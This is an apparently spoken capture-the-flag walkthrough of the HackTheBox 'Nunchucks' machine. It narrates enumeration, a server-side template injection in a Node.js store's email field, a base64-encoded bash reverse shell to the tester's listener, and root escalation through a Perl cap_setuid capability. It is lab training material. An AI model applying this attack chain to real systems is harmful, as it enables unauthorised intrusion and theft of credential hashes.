Hey guys, what's going on? This is Tim. Today we're doing the nunchucks box from hackthebox. The IP address is 10.10.11.122. So let's get started. So we'll start off with an nmap scan. We'll put the IP in there. We're going to save it to a file, nmap.txt. So we'll run that. And we're scanning for all ports. Looking for service versions, operating system, scripts. And we're using the minimum rate 5000 and T4 to make the faster scan. So while that's running, we can check out the browser, see if there's anything on port 80. And we can see straight away that you need it's getting redirected to https nunchucks.htb. So we need to add that to our host file. So open a new tab and do a nano, open the host file, and we're going to add our IP in there, and we're going to make it nunchucks.htb and save that. See how the nmap's going, still going. So now if we refresh the page, we get the nunchucks landing page. And we've got a few links here, don't seem to do much. Details, we've got a sign up thing here. So we can try signing up with test, and password, and we're sorry, registration is currently closed, so you can't do anything with that. Let's see, got any service versions or anything in the page? Doesn't look like it. So we can take a look at the source page, see if there's anything in here we can use to exploit the machine. It doesn't look like it. No, there's nothing there. So you can have a look at our nmap results. We've got port 22 is open SSH. It's running version 8 open SSH 8.2.p1. We've got port 80 open HTTP Nginx 1.180, and we can see it follow redirect to nunchucks.htb. 443 is open. That's HTTPS. That's all the ports that are open, and it's Linux operating system. Okay, so if we clear the screen, we've got our nmap.txt saved there in case we need it. Have a look at it in the future. Just got our nmap results, so we can do a dir search for any directories. So we'll put nunchucks in here, and make it HTTPS. We'll run that. See if we can find any directories we can have a look at. And this takes a while, so I'll just pause the video. I'll be back soon. Alright, we're back. You can see we've got assets, login, privacy, sign up, terms. Scan's almost finished, so we can have a look at assets. See if there's anything on that page. That page doesn't exist. Login. I don't think that'll do anything. You've got to log in. No, there's nothing there. We don't know email or password. We can't log in because it's closed for registration anyway. Privacy. We've got a privacy policy. Nothing there we can use that I can see. Sign up, terms. There's sign up, we can't sign up, so there's no point looking at that. What's terms? Terms and conditions. Alright, so that's pretty much a dead end. Okay, so the next step will be to look for any subdomains. So there's nothing there we can use really out of those, so we'll do wfuzz. We'll run this with nunchucks.htb, and we'll change that to the IP of this machine, which is 122 HTTPS, and we're using the word list, sec list, discovery, DNS, subdomains, top 1,110,000.txt, and we're fuzzing for any subdomains. So we'll run that, and we can see from our results we have stop that. Go back up the top and have a look, and we can see we've got words of 2271W, so we want to filter that out, so otherwise we end up with lots of results. So control the L to clear the screen, and we'll do the flag HW and 2271. We'll run that, and straight away we see we've got store there. It's found store as a subdomain. So we'll let that keep running, but we'll add store to our host file. See if we can have a look at that. We'll go store .nunchucks.htv and save that. Now we'll go back to our browser and we'll add store in here as a subdomain. And we see we've got nunchucks store. So we can have a look at the source page. See if there's anything on there we can use. No, it doesn't look like it. We can have a look at Wapalizer, see what this page is using. And it's using Express, Node.js, programming language, the Express web server, web framework. So it might be handy to look up something about that. So we'll just we'll capture this with burp, have a look at it on burp. So we'll start our Foxy proxy on port 8080 and turn the intercept on burp, and we'll refresh the page, and because it's HTTPS we've got to accept the risk and continue, and we'll send it to repeater. Alright. Actually, no, there's nothing there we can do. Hang on. Let's have a look back at. Let's turn this off again. Go back to our store page. We want to let's just grab that and drop that one. It's not the right request. You can see we've got an email here, notify me, in here, so we want to try to do something with this. See if there's any SQL injection or any other vulnerabilities. In here. Those links go nowhere. So we'll just say test at HTTP. Now this time we'll capture it. So we'll turn that on, intercepts on, and we'll say notify me. Okay, then now we'll send it to repeater. And we can see we've got email test HTTP here. So the next thing we want to try and do is look at see if there's any SQL injection vulnerabilities. So we'll just put a single quote in there and we'll send. You will receive updates on the following email address. So there's no vulnerability there by the look of it. So we'll try for a SSTI vulnerability, which is a server-side template injection. So we'll just use 7 times 7 in there. This is a test to see if we've got any vulnerabilities with STI. So we'll send that. And we see we get, you receive updates on the following email address, test 49. So it's given us what 7 times 7 is. So there is a vulnerability with SSTI. Okay. So what we'll do next, leave that there, and now we'll have to do a bit of searching around to find a payload. So we'll go on the browser, turn burp off, and we'll try Hacktricks. It's a great website to find lots of payloads. So we'll have a look here, and we saw before it was Node.js, so have a look down here, see if there's exploits, Node.js, these are all Node.js, and look, we've got nunchucks, which is very close to the name of the box, so I'm thinking it might be that one. So we'll click on that, and we can see we can test it with 7 times 7, which we've done that. We got 49. So it's proved that it is a vulnerability. So we'll copy this. Copy that. And we'll go back to our burp and we'll paste it in there. And this should give us the tail of the password file. So if we send that, we get unexpected token R JSON position 35. Okay, so what we need to do is we need to, because we've got these because we've got these quotes here, we need to escape them, and we use a backslash to escape them. So if we put a slash in there and another slash in here where the quotes are. What the hell? What's going on with this? No, we don't want that there. No. Alright, we'll put a slash there, we'll try running that now. And there we go. We can see we've got the tail of the password file there. Alright, so that's working. So now it's just a matter of trying to get try and get a reverse shell. So we'll get our reverse shell from reverseshells.com. IP address, my ton0 IP address is, my VPN is 10.10.14.12, so that's right. Got 9001 is the port, so we'll copy that. And we've got to go to our terminal and we've got to convert it to a base64 file for this to work. So we'll do echo and we'll put our reverse shell in there. We also need to do bash-c first. That's the command. And put that in quotes. And then close that and quotes on that one. Yep, and now we'll convert it to base64. Okay, so now I'll just copy this here, and we're going to put that in. We're going to start a listener on 9001. So that's listening and waiting now for a connection. And in here we're going to get rid of that, and we're going to do echo and paste in our reverse shell there, which is base64 encoded, and we're going to pipe to bash. Oh, sorry, not the base64. Pipe to base64 and decode it, and then pipe to bash. And we'll send that. Hopefully we'll get a connection. It's waiting. So now if we have a look back on our and we see we've got David at nunchucks. We have a connection. Alright, that's good. So we do ID now. We can see where David, with user David. Right, so the next step is to we can get the user flag. So if we do go to home, do an ls, and cd David, and we'll just do ls-la, and we can see we've got user.text there, and David can view it. I think no, root, only root can view it. So we need to escalate our privileges. So let's clear the screen. If we do a sudo-l, we need to be a terminal first before that'll work. So we need to put this Python command in here. Now do a sudo-l. We don't know David's password, so we can't use that without the password. So we can search for David's credentials. So if we do is go to cd var, we've got www there, so if we do cd www, we've got nunchucks, store nunchucks. Let's have a look at store nunchucks. Have a look at that. We've got assets, controllers. Doesn't look like there's any config files in there. We've got assets. No, there's nothing in there. Alright, so go back. Have a look at nunchucks. Have a look in there. So it's similar things. So there's no credentials that I can see. Alright, so we'll go to our temp folder, and we're going to upload linpeas. So we'll go to privilege escalation folder on my machine, and we can see we've got linpeas.sh in here. So that's a good for finding any finds any vulnerabilities to get privilege escalation. So we'll start a Python server. Okay, that's running now on port 8000. So now we can upload that to our target by doing a wget command, http 10.10 14 12, which is my VPN, 8000, and do linpeas.sh. That's uploading to the target. If we do an ls now, you should see linpeas there. So now we've got to change to make it executable. So we'll do +x linpeas.sh, and then we'll run it. Just let that run. I'll just pause it while that's running. I'll come back when it finishes. Okay, we're back. It's finished, so go back up the top, look the scan, have a look, see what we can find. So we've got anything red and yellow is a 95% P vector. In red, take a look at it. So we're looking for anything red and yellow or red to find any vulnerabilities. We've got sudo version 1.831 there, which is red. We'll look through here. We've got, it's possibly vulnerable to PwnKit there. We could try that if we can't find anything else. Let's have a look through the output of our linpeas scan. So what have we got? Active ports. Keep looking through, see if we can find anything red and yellow to start with. Well, what have we got here? Files with capabilities. USR bin perl cap underscore set UID plus EP. That looks like it could be the way to get into this, get privilege escalation, because it's in red and yellow. So we'll just copy that. And we'll look on our browser. Say priv escalation. File not found. Get rid of that part of it. And we can see we've got GTFO bins here. It's got something to do with capabilities. There's a few there we can check. Let's have a look. Let's have a look at GTFO bins. And capabilities. There we go. So this binary has Linux cat set UID capability set. or is executed by another binding with a capability set, it can be used as a backdoor domain privilege access. Alright, so we can use this here to get privilege escalation. So we want to create a script. So what we'll do is close that, and we'll create a script called it's called test.sh. It's a bash script, and it's going to be perl, so we need that. We need usr /bin/perl. So what kind of script it is, and so we've got to use this information here. So we want to use that, copy that, the next part of it we want to do is this, copy that, and then we want to do that bit there, copy that, and we also want to do a -p on that. Alright, so we'll save that. Now we'll still get our Python server running there, so we'll just close that one and start a Python server on this one. So now we'll do a wget http 10.10.14.12 port 8000, and it was test.sh. It's saved on our machine. Do ls, we can see it now. Yes. We'll do search mod +x test.sh. Okay. So now if we run that, and we do an ID, you can see we're root now. So we can now get all the flags. So we can do cd the root ls. We've got root.txt there. We do ls-la. We can read it. Yep, root.txt, and we can do cd home and cd David, and we got user.txt there, so we can read that now because we're root. So we can also look at the password file. Shows all the users, and we can look at the shadow file. And then we can see the password hashes there, which we could crack if we wanted to, but we don't need to because we're already root. We've got the root password here, and we've got David's password. There's no other users on the machine. Alright, that's about it for that one. See you next time.